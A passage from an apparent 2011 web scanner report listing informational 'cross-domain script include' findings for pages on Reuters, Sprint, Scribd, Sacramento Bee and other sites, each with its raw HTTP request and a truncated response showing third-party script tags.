Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:25 PM?0&9/3/2011 6:27:59 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:46 PM?0&9/3/2011 6:28:53 PM?0&9/3/2011 6:29:27 PM?0&9/3/2011 6:29:17 PM?0&9/3/2011 6:29:16 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:29:16 GMT
Connection: close
Content-Length: 310128

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.35. http://www.personalcreations.com/radioDefault.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /radioDefault.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /radioDefault.aspx HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:37 GMT
Connection: close
Content-Length: 10266


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script src="http://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.36. http://www.personalcreations.com/sitemap.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /sitemap.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sitemap.aspx HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:19 GMT
Connection: close
Content-Length: 108984

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

19.37. http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /article/2011/09/04/us-weather-football-idUSTRE78222D20110904

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/2011/09/04/us-weather-football-idUSTRE78222D20110904 HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie; __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:46 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:45:26 GMT
Last-UpdatedL: Sun, 04 Sep 2011 00:22:35 GMT
CHANNEL-NAME: domesticNews
Last-UpdatedA: Sun, 04 Sep 2011 00:22:35 GMT
Host: www.reuters.com
Age: 139
Vary: Accept-Encoding
Content-Length: 91160
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF26 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:45:27 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<li class="linkedIn " tns="no">
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
</span>
<script src="http://cdn.echoenabled.com/clientapps/v2/jquery-plugins.js"></script>
<script src="http://cdn.echoenabled.com/clientapps/v2/stream.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=851&amp;ct=REUTERS_INVESTING&amp;tr=NEWS_MARKETS&amp;num=4&amp;layt=1&amp;fmt=simp"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="https://apis.google.com/js/plusone.js">
{"parsetags": "explicit"}
</script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

19.38. http://www.reuters.com/assets/commentsChild

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/commentsChild

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&articleId=USTRE78222D20110904&headline=Notre+Dame%2C+Michigan+stadiums+cleared+due+to+storms&channel=domesticNews&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:34 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:45:00 GMT
Age: 274
Vary: Accept-Encoding
Content-Length: 5292
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF43 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:45:00 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

19.39. http://www.reuters.com/assets/newsFlash

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/newsFlash

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1&vcount=1&videoChannel=1&w=728&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:27 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:47:39 GMT
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Age: 48
Vary: Accept-Encoding
Content-Length: 10669
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF37 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:47:39 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...

19.40. http://www.sacbee.com/notfound/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /notfound/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /notfound/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Proxy-Connection: Keep-Alive
Host: www.sacbee.com

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 56279
Expires: Sun, 04 Sep 2011 00:58:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:58:25 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<!-- JavaScript files -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
<div style="float:right">
<script src="http://get.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=320" type="text/javascript"></script>
...[SNIP]...
<!-- start Lingospot web stories -->
<script type="text/javascript" src="http://get.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300"></script>
...[SNIP]...
<div id="MI_post_load" style="display:none;">


<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=3_Sacbee"></script>
...[SNIP]...

19.41. http://www.scribd.com/embeds/63688924/content

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scribd.com
Path:   /embeds/63688924/content

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd HTTP/1.1
Host: www.scribd.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 04 Sep 2011 00:55:48 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By:
X-Runtime: 53ms
Status: 200 OK
Age: 114539
X-Cache: HIT from squid03.local
Via: 1.1 squid03.local:3128 (squid/2.7.STABLE9)
Expires: Sun, 04 Sep 2011 00:55:47 GMT
Cache-Control: no-cache
X-Debug: Embed with squid
Content-Length: 9396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
</style>


<script src="http://s6.scribdassets.com/aggregated/javascript/base.js?1314908997" type="text/javascript"></script>
...[SNIP]...
<!-- Start Quantcast tag -->

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.42. http://www.scribd.com/embeds/63688924/content_inner

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scribd.com
Path:   /embeds/63688924/content_inner

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /embeds/63688924/content_inner?start_page=1 HTTP/1.1
Host: www.scribd.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 04 Sep 2011 00:59:34 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By:
X-Runtime: 30ms
Status: 200 OK
Age: 103946
X-Cache: HIT from squid01.local
Via: 1.1 squid01.local:3128 (squid/2.7.STABLE9)
Expires: Sun, 04 Sep 2011 00:59:33 GMT
Cache-Control: no-cache
X-Debug: Embed with squid
Content-Length: 25358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
</style>


<script src="http://s6.scribdassets.com/aggregated/javascript/base.js?1314908997" type="text/javascript"></script>
...[SNIP]...
</style>
<script type='text/javascript' src='http://fonts4.scribdassets.com/static/4gen.js?1314662118'> </script>
...[SNIP]...
<!-- Start Quantcast tag -->

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.43. http://www.sprint.com/index_c.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sprint.com
Path:   /index_c.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index_c.html HTTP/1.1
Host: www.sprint.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=105E1B5AD68B10D605E2BDF5FE0A4306; TLTUID=105E1B5AD68B10D605E2BDF5FE0A4306; Apache=50.23.123.106.1315095358451950; TLisset=true; mbox=check#true#1315097121|session#1315097027971-178294#1315098921|disable#browser%20timeout#1315100658; naf=userSeg~Interstitial Home Page; s_sv_sid=203069262488; s_sv_112_p1=1@10@s/6293&e/2; s_sv_112_s1=1@16@a//1315097069380; s_vi=[CS]v1|273164E305162D78-600001A660177E59[CE]; segment_user=consumer; user=xyz%7Cconsumer; s_cc=true; gpv_p37=Home%20Page; gpv_p38=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page; s_sq=sprintuniversalsiteprod%3D%2526pid%253DHP%252520%25253A%252520IHP%252520%25253A%252520Sprint%252520Home%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.sprint.com%25252Findex_c.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:34 GMT
Server: Apache/2.2.14 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 41758
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<!-- CHAT PROACTIVE START -->
<script type="text/javascript" src="https://sprintproactive.ehosts.net/netagent/proactive/proactive.aspx" defer="defer"></script>
...[SNIP]...

19.44. https://www.sprint.net/performance/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /performance/ HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:32 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 12931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
</script>
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

19.45. http://www.und.com/sports/m-footbl/9873956

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/m-footbl/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
